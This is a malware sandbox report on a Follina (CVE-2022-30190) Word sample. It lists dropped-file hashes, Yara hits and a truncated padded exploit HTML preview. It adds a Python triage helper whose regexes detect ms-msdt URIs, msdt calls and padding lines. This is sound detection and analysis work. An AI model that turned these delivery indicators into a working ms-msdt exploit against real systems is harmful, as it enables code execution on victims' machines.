Preview: <!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
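The two cached HTML files above share one hash and are flagged by the same three Yara rules: an ms-msdt: protocol URI inside script, and a body that is mostly "//AAAA..." comment padding (7056 bytes at an 8-bit entropy of 1.16). The following triage helper is an added example, not part of the Joe Sandbox report or of the cited Yara rules; it applies the same two observations to an Office cache file with its own approximate regexes, recomputes the report's entropy measure, and also recognises the C:\Windows\Temp\SDIAG_<GUID>\ path the DiagPackage.dll match points at. The sample HTML it scans is constructed for the demo (the URI body is a placeholder, not an exploit), and the verdict thresholds are assumptions made for this example.

```python
import hashlib
import math
import re

# Heuristics that approximate the detections named in the report's Yara hits
# (EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 and
# SUSP_PS1_Msdt_Execution_May22). These regexes are my own, not the rule bodies.
MS_MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)
MSDT_CALL = re.compile(r"\bmsdt(?:\.exe)?\b", re.IGNORECASE)
# A JavaScript comment line made of one character repeated 64+ times,
# i.e. the "//AAAA..." padding visible in the dropped-file previews.
PAD_LINE = re.compile(r"^[ \t]*//[ \t]*(.)\1{63,}[ \t]*\r?$", re.MULTILINE)
# msdt.exe unpacks the troubleshooter into C:\Windows\Temp\SDIAG_<GUID>\,
# the location of the DiagPackage.dll match earlier in the report.
SDIAG_PATH = re.compile(
    r"\\Windows\\Temp\\SDIAG_[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\",
    re.IGNORECASE,
)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the same measure as the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_html(data: bytes) -> dict:
    """Score one cached HTML file and return its indicators plus a verdict."""
    text = data.decode("latin-1")  # byte-transparent decode, never raises
    pad_lines = PAD_LINE.findall(text)
    result = {
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "entropy": round(shannon_entropy(data), 3),
        "ms_msdt_uri": bool(MS_MSDT_URI.search(text)),
        "msdt_reference": bool(MSDT_CALL.search(text)),
        "padding_lines": len(pad_lines),
    }
    # Verdict thresholds are assumptions for this example, not the report's.
    if result["ms_msdt_uri"]:
        result["verdict"] = "follina_like"
    elif result["msdt_reference"] or result["padding_lines"] >= 8:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result


def is_sdiag_artifact(path: str) -> bool:
    """True for files under the SDIAG_<GUID> folder msdt.exe creates (post-exploitation artifact)."""
    return bool(SDIAG_PATH.search(path))


# Constructed sample for the demo: padding comments like the report's previews,
# then a script that hands a placeholder ms-msdt: URI to the browser control.
# The URI body is deliberately not a working exploit.
PAD_BLOCK = "".join("//" + "A" * 100 + "\r\n" for _ in range(20))
SAMPLE_HTML = (
    '<!doctype html>\r\n<html lang="en">\r\n<body>\r\n<script>\r\n'
    + PAD_BLOCK
    + 'window.location.href = "ms-msdt:" + "<placeholder>";\r\n'
    + "</script>\r\n</body>\r\n</html>\r\n"
).encode()

# Constructed benign control: a normal small HTML fragment with no padding and no URI.
BENIGN_HTML = b"<!doctype html>\r\n<html><body><p>Quarterly report</p></body></html>\r\n"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, triage_html(blob))
    print(is_sdiag_artifact(r"C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll"))
```

Run it over the files in a user's Content.MSO cache directory (read each one as bytes and pass it to triage_html) and compare the entropy with the report's value: a script file that is mostly padding lands near 1 bit per byte, well below what real JavaScript produces, which is a useful second signal even before the URI match fires.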

Dropped file
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1536
                                                                                                                                                                                                      Entropy (8bit):0.7710450912559451
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:5lsl4/I5lNVRIYk/lElXlAPlMOau+2lT8M1nRF5Zfdkl5XHlRtp/gdl/ABdllqPe:olgI5lNcYWeuPa+ejJoYB4PxZUtLsmN
                                                                                                                                                                                                      MD5:DF555F2BD2F7953B785FBD5C2EC880ED
                                                                                                                                                                                                      SHA1:EC5BBE67F462283F60964E804FEA21BE05DEDE5E
                                                                                                                                                                                                      SHA-256:B5E66DC74C4F74A231454D7843C6A8E9B6DFF18E51AF4590CC460FE9E5373E6D
                                                                                                                                                                                                      SHA-512:E2C31A4890ECD7B809D27DF505BAD97BD9B5BF7A7F5900C07F81705221FFCD13F949A57E8DBC5D07E025FE2778DC37F75346D24CEE342C1316FFC493632C95E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.w.w.w...m.a.l.w.a.r.e.j.a.k.e...c.o.m./.4.5.6...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                      Size (bytes):7056
                                                                                                                                                                                                      Entropy (8bit):1.1561718807594425
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
                                                                                                                                                                                                      MD5:B92EE400BE1F2612B4138031DFC5881E
                                                                                                                                                                                                      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
                                                                                                                                                                                                      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
                                                                                                                                                                                                      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      IE Cache URL:https://www.malwarejake.com/456.html
                                                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.109227188287232
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:H0iC9A++f8dWDfHpFhKRVg5fII+ycuZhNJakSHPNnq9Wd:pxcsBKTg5g1ulJa3Vq9m
                                                                                                                                                                                                      MD5:5A0990F40A5444A25E5FD9960BAB9D5A
                                                                                                                                                                                                      SHA1:AA98D6AD1621385FD84DAF65E2D8DC5F34868E86
                                                                                                                                                                                                      SHA-256:120788C51662671D9850960A7B00C1E19DEFCB6AE28E82E388FF4362F0488FA0
                                                                                                                                                                                                      SHA-512:6C814F6A03F54474999B1B605AA21F2688544C759C05BB587EC5BAF710DA25EBF0D52C182403AE9D3FE1FD8DD761C038122CACD645537FEEB51C2CD0ADEB716D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP.................i1..).N=................4.......C:\Users\user\AppData\Local\Temp\RES2066.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.d.5.a.k.k.d.2...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.109205847717311
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:H1iC9AWZfODfHHhKRVg5fII+ycuZhNnakSJPNnq9Wd:KWB0hKTg5g1ulna3rq9m
                                                                                                                                                                                                      MD5:C5E789955217380A4DB3F09DE237D648
                                                                                                                                                                                                      SHA1:4887CC9110AA8963503EB88D20463309ED48DFF2
                                                                                                                                                                                                      SHA-256:14D6C6AEBB63656618400FF9A3B2AB53F2B796A57A1F8826D08E04E022C89535
                                                                                                                                                                                                      SHA-512:289E74DCEB35A7D33D1B3678E59A96F87F59F4DF476641ED8E89B17AFF4B1DDE6235A820724BDD20F3614DB62E9E9A3D0C657A048E65F8C205F821855CBE6ACD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP................._...l<."..%.8...........4.......C:\Users\user\AppData\Local\Temp\RES67B5.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.h.g.y.c.n.j.1...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.107543091783012
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:HHiC9A++fS37SDfHdWhKRVg5fII+ycuZhNhfakSIYPNnq9Wd:Ax/9MKTg5g1ulhfa3Igq9m
                                                                                                                                                                                                      MD5:230154DD29F686AA4F6F4A644F5F5590
                                                                                                                                                                                                      SHA1:C30DC444975F3DE2E5F4663D32DCF0955F2572EE
                                                                                                                                                                                                      SHA-256:97AE240600AD815D5E225554CEA752F3BFE2239574F3A96CE5CC0068BC4C7535
                                                                                                                                                                                                      SHA-512:EB7D40E9FD1B4BCFEB10C9853DC5ED3360C2C1E5C053971B21A950391EA2C12B4141E03A8C7FF1A954B2C115844A122C7E2E72687BB5C0C89E749F5159FC8B47
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP...............><}......P...8;..........4.......C:\Users\user\AppData\Local\Temp\RES7E0C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                                                      Entropy (8bit):3.1004839187935667
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybfak7YnqqIYPN5Dlq5J:+RI+ycuZhNhfakSIYPNnqX
                                                                                                                                                                                                      MD5:3E3C7D0688DEB6FD168550FCF109383B
                                                                                                                                                                                                      SHA1:0032779AC0FC1F5E0C34F871BEABCA8CE1E6F02C
                                                                                                                                                                                                      SHA-256:01D86F9F87F016A6951A9CFD6626CC6A380825C637E1B0E6590989077E1FE170
                                                                                                                                                                                                      SHA-512:3DB74ECD13DEE4F662EE7791F7BCD4854F7C821833C8C36F52A13B17ECA820F636A61B5C75A754FD2B849DD48F363C502482138FD63E685CE6D6F75DF19C8461
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.y.w.b.h.p.s.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3584
Entropy (8bit):3.0882563191908634
Encrypted:false
SSDEEP:48:6Fpqb927GslP0DRjyJ/7Vk1ulhfa3Igq:Hc7GmRnLK
MD5:496741C3EDE413E372E16E5BCE7EF34C
SHA1:AF4FB62FA33C35DB9100266AA4B7067284B95C74
SHA-256:1420DB6C98A20582FF19EC21E7EB793D6C03196FFB8192B5D9F4B7848C140046
SHA-512:DDF728E8C0ABCB36647DD652BB0763A2F3229A23AB58F40189A9B50FA9E904977B050DB6A71D43474D516BB61661126FA797C439B922986A94A3396C38EF143E
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.1099724463693086
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUYak7Ynqq1NPN5Dlq5J:+RI+ycuZhNJakSHPNnqX
MD5:E513693101D929A84E3D900EE61699DD
SHA1:3D043E4D840618B713CD281462A70814C793E219
SHA-256:64A976F97C37092D7077BA1D2CD047B38162D20B0D7FDF7EBC1622C5920028AA
SHA-512:429DB24BF5AE293DAE21A5181E3AA8AB21714A1AB6729332A0922BC78191FDEAC5BF9BAF31E79BB758F42FABCE9F524C1B043AC215AEFC0DC3AE933F033B2116
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):9728
Entropy (8bit):4.798232866869047
Encrypted:false
SSDEEP:96:sKqedmYoNKvUTCSH3gR8H8FgwSHwB8kwZYPaSJ365OxZieMjQZaeRnIjrK:1ElNK8TCSfHyP8kwZ+vKOxCQZvnr
MD5:C197593FFC2F52FD92CBEA72E075F1A0
SHA1:4952E8A10D35ECB33F6F4C5EB75FFABE43274C37
SHA-256:18B5EF953D4D761AADCD20D8C76996A439FC4893E8D3BF033108D2B219160A10
SHA-512:2A7280C552C069CB0E7CAA1AD644DFF5A30E9C1C702472E155339AA45AA0D6E385F97CA062119138FC1F7A391BB98029093F88F27344F1FC2CAE982396F2635C
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.1091341615018844
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNYlYak7YnqquYlNPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
MD5:C35FE102DC6C3CF28522BAAD25FE3885
SHA1:EBE42FDE81A25D1EE7BD2569140906234C354F2C
SHA-256:A68E081DD52BBB85E2533993DE83A15A3E8A08D26B062FC0831E176794709B7B
SHA-512:CE25E9D961AECE940E454359B6A63CAEE5ED5EACCC9785EFB0CFEAAFA8D8C44F92C583CF0D3D6F83F78DDEFE783D64F4E0770CF92317986923B5452D85D14642
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):5120
Entropy (8bit):3.783600177198582
Encrypted:false
SSDEEP:48:6wmoPhmKraYZkH8KTibUyeUkwjj0JCxC+CFSlwYKc1ulna3rq:ntDaAkHHoZk8BCumFK
MD5:8B796E64F83118AFDE3E9F498265CDBF
SHA1:4416C9C664AE69132216CC2026F93324D6D5D4BD
SHA-256:001BEA56B0790B88100C45018B064A7C53EAC2553666CFFF701BDAEFBEE92BE2
SHA-512:BBBB59A15E665E8AEB6AED426FB944C2C6F65F65C894B193F8A77E2CDFE65E480DBF4BC22E4041DE05CA5297EC817D2017391E50450FC9CF55C7B685E158D56C
Malicious:false

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):72
Entropy (8bit):4.786273488348122
Encrypted:false
SSDEEP:3:bDuMJlMKpO1d2mxWfOO1d2v:bCAm
MD5:22FF1DED7C768389EA5A0012AD7FFDB7
SHA1:3C6A3F7DCF0A4DF09F1C6649D44517042797A9FC
SHA-256:4B03CCDC4AF57995C882CEE2F0FF79078A3521735DA3976B07F3DF4A2BFB658D
SHA-512:8011B24585EC92ED0E5A6E4806D89533DE7604BFD949B663B7EEF16EA1D40D3F93BEA03F07E04EE9D10456FE8C3D87F7EB7AF06BE515A686D79EBE5CD6182DBB
Malicious:false
Preview:[folders]..Templates.LNK=0..qoIZSkdejM.LNK=0..[misc]..qoIZSkdejM.LNK=0..

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 12:41:32 2022, mtime=Thu Aug 18 05:34:59 2022, atime=Thu Aug 18 05:34:39 2022, length=10469, window=hide
Category:dropped
Size (bytes):1060
Entropy (8bit):4.6951658571475186
Encrypted:false
SSDEEP:24:8CGrVDfAf/bySUAJbM5CFgDC7eV7ek7aB6m:8CGrVDfI/by+JQ54K8hB6
MD5:0E18A3F4A8CDE9AFB2D77DF021B76C7A
SHA1:E1C575792AA0BA797C7F08234E01E3D8A52C2810
SHA-256:E658F5E97D803A4550CDE65F9487B68AE32742B2BA9CB7DD434E8CE6F29B1B01
SHA-512:E0A7F1F08B6FE30352DB4C890695ECB406291DB4B1C83D987835457C6B1F90F7B8BE75BAF192DD028DE3786005654B4433AF66E9D228F1E73950816E755B5000
Malicious:false

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.562897579687689
Encrypted:false
SSDEEP:3:Rl/ZdMr5t9lqKZMw4uklEJltl//urh//n:RtZEOCM0X7/kx
MD5:0E835BBF4E53576ED249E2EFEFAB70BB
SHA1:8102488DFB784969313BD4FF14A53B0AA1EDDBBD
SHA-256:07E9D25F2DBED077ECE447EB678EE243AEBAC9C53569F443D4E592201AAA77DD
SHA-512:9C6A19AEA2F355E0DD44A7D071E7D657FE5E328D0FF5D9180ED6D3E79D4D5BBBA3589CC62CB15289F02546672C0689B24BB6F6CBE7491AC6C119AC89358A684A
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........x..U............$.......6C......|..U....P+..P+..P+..............p..U................

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:Little-endian UTF-16 Unicode text, with CR line terminators
Category:dropped
Size (bytes):20
Entropy (8bit):2.8954618442383215
Encrypted:false
SSDEEP:3:QVNliGn:Q9rn
MD5:C4F79900719F08A6F11287E3C7991493
SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
Malicious:false
Preview:..p.r.a.t.e.s.h.....
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.562897579687689
Encrypted:false
SSDEEP:3:Rl/ZdMr5t9lqKZMw4uklEJltl//urh//n:RtZEOCM0X7/kx
MD5:0E835BBF4E53576ED249E2EFEFAB70BB
SHA1:8102488DFB784969313BD4FF14A53B0AA1EDDBBD
SHA-256:07E9D25F2DBED077ECE447EB678EE243AEBAC9C53569F443D4E592201AAA77DD
SHA-512:9C6A19AEA2F355E0DD44A7D071E7D657FE5E328D0FF5D9180ED6D3E79D4D5BBBA3589CC62CB15289F02546672C0689B24BB6F6CBE7491AC6C119AC89358A684A
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........x..U............$.......6C......|..U....P+..P+..P+..............p..U................
Process:C:\Windows\SysWOW64\msdt.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):24702
Entropy (8bit):4.37978533849437
Encrypted:false
SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:191959B4C3F91BE170B30BF5D1BC2965
SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:false
